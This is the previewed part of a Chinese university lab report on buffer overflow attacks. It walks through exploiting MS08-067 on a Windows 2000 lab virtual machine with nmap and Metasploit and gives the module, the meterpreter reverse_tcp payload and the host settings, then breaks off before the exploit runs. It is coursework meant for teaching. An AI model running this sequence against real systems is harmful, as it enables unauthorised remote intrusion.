缓冲区溢出攻击与防范实验报告

缓冲区溢出攻击与防范实验报告

ID:35354969

大小:1.24 MB

页数:20页

时间:2019-03-23

缓冲区溢出攻击与防范实验报告_第1页
缓冲区溢出攻击与防范实验报告_第2页
缓冲区溢出攻击与防范实验报告_第3页
缓冲区溢出攻击与防范实验报告_第4页
缓冲区溢出攻击与防范实验报告_第5页
资源描述:

《缓冲区溢出攻击与防范实验报告》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、实验六报告课程名称网络安全实验成绩实验名称缓冲区溢出攻击与防范实验学号20151681310479姓名郑明毅班级网络工程2班日期2018/6/7实验报告一、实验目的及要求:1.实验目的通过实验掌握缓冲区溢出的原理;理解缓冲区溢出危险性;理解防范和避免缓冲区溢出攻击的措施。2.实验要求(1)利用缓冲区溢出工具或者利用一个简单的溢出C程序进行溢出漏洞攻击(2)分析缓冲区溢出攻击原理和危害(3)给出防范和避免缓冲区溢出攻击的措施二、实验过程及要点:实验过程:MS08-067(WindowsServer服务RPC请求缓冲区溢出漏洞)远

2、程缓冲区溢出攻击测试1 网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行win10系统的计算机,如图2所示的Windows2000系统(虚拟机环境下)的计算机。显然这2台计算机处于同一个网段中,可以相互通讯,win10系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows2000系统都是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁。图1win10攻击机图2Windows2000靶机2、扫描靶机在正式开始渗透之前,应该对靶机进行扫

3、描探测工作,搞清楚渗透目标的系统类型、开放的端口服务、可能存在的安全漏洞等。 在win10攻击机上运行metasploitconsole,即可进入Metasploit环境。现在可以利用MSF框架中集成的Nmap扫描器对渗透测试目标进行扫描,如图3所示,获取了靶机的开放服务和操作系统类型等信息。图3windows2000扫描结果利用扫描器的脚步插件,还有可能直接探测出目标系统的安全漏洞,例如如图4所示,Nmap利用smb-check-vulns插件扫描探测出了Windows 2000靶机存在MS08_067漏洞,命令执行如下:n

4、map-script=smb-check-vulns.nse192.168.56.101。namap扫描的结果里报告发现MS08-067:DISABLED。这是在暗示我们或许能够对这台主机进行渗透攻击,然后我们在Metasloit里面找到此漏洞的攻击模块,并尝试攻击目标机器。MS08-067是一个对操作系统版本依赖非常高的漏洞,所以在这里,我们只自动payload指定一下目标就可以确保触发正确的溢出代码。图4漏洞扫描结果3利用MS08_067漏洞渗透入侵 MS08-067漏洞的全称为“WindowsServer服务RPC请求缓

5、冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求,则该漏洞可能允许远程执行代码。在MicrosoftWindows2000WindowsXP和WindowsServer2003系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。既然已经知道Windows 2000靶机存在MS08_067漏洞,下面就在Metasploit环境中利用它进行渗透入侵。 

6、首先,输入searchms08-067查找与其相关的漏洞攻击程序,并启用该渗透攻击模块查看基本信息,然后,输入useexploit/Windows/smb/ms08_067_netapi命令表示选择利用这个漏洞,如图5所示。图5选择漏洞如上我们已经驾驭了(ms08_067_netapi)这个漏洞攻击程序,哈哈!接下来我们要找一找metasploit下的有效攻击荷载(payload),那就使用命令:showpayloads来查找一下吧!然后用set命令选择一旦利用漏洞渗透进去使用什么攻击载荷,这里使用MSF框架里功能强大的Met

7、erpreter攻击模块下的反向连接shell载荷,使用命令:setpayloadwindows/meterpreter/reverse_tcp,执行如图6所示。图6选择攻击载荷完成渗透攻击模块与攻击载荷模块的选择之后,需要查看配置渗透攻击所需的配置选项,具体命令如下:showoptions用show options命令查看还有哪些参数需要配置,根据目标情况配置渗透攻击的选项。如图7所示:图7需要配置的参数now,现在我们需要设置ip咯,设置命令:setRHOST192.168.56.101setLHOST172.18.7.1

8、91配置本地攻击机和远程靶机的IP地址,如图8所示图8配置参数现在呢,我们基本已设置完成,接下来我们show一下看看自己的配置都在不?确认一下信息:(看到了吧,我们的配置没问题吧!Ip都有了啊!!!)图9检查配置参数所有需要的参数配置好了以后,在进行exploit渗透攻击时,

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。